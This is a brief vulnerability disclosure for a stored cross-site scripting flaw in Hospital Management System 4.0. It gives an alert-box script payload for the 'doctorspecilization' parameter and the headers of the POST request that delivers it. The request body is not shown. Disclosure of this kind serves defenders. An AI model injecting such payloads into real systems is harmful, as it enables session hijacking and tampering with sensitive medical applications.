Hospital Management System 4.0 Cross Site Scripting

Hospital Management System version 4.0 suffers from a persistent cross site scripting vulnerability.

MD5 | 0094e7933b75af351889a88eafd76a03

# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage:
# Software Link:
# Version: v4.0
# Tested on: Windows
# CVE : N/A

================ 1. - Cross Site Scripting (Persistent) ================

Method : POST
Parameter: doctorspecilization
Attack : </td><script>alert("XSS");</script><td>

POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
DNT: 1
Connection: close
Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed

Related Posts